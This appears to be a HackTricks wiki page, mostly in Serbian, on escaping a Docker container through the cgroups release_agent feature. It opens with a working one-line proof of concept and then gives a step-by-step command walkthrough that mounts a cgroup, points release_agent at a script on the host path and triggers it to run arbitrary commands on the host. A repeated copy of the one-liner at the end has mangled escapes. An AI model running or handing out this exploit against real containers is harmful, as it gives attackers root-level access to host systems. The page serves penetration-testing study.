Docker release_agent cgroups escape

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Za više detalja, pogledajte originalni blog post. Ovo je samo sažetak:

Original PoC:

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a release_agent file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved:

Pripremite Okruženje:

Direktorijum /tmp/cgrp se kreira da služi kao tačka montiranja za cgroup.
RDMA cgroup kontroler se montira na ovaj direktorijum. U slučaju odsustva RDMA kontrolera, predlaže se korišćenje memory cgroup kontrolera kao alternative.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

Postavite Dete Cgroup:

Dete cgroup pod imenom "x" se kreira unutar montirane cgroup direktorije.
Obaveštenja su omogućena za "x" cgroup pisanjem 1 u njegov notify_on_release fajl.

echo 1 > /tmp/cgrp/x/notify_on_release

Konfigurišite Release Agent:

Putanja kontejnera na hostu se dobija iz /etc/mtab datoteke.
release_agent datoteka cgrupa se zatim konfiguriše da izvrši skriptu pod nazivom /cmd smeštenu na dobijenoj putanji hosta.

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

Kreirajte i Konfigurišite /cmd Skriptu:

Skripta /cmd se kreira unutar kontejnera i konfiguriše se da izvršava ps aux, preusmeravajući izlaz u datoteku pod imenom /output u kontejneru. Puni put do /output na hostu je specificiran.

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

Pokreni Napad:

Proces se pokreće unutar "x" child cgroup i odmah se prekida.
Ovo pokreće release_agent (skriptu /cmd), koja izvršava ps aux na hostu i zapisuje izlaz u /output unutar kontejnera.

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Previousrelease_agent exploit - Relative Paths to PIDs NextSensitive Mounts

Last updated 2 months ago

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=$[^,]*$.*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o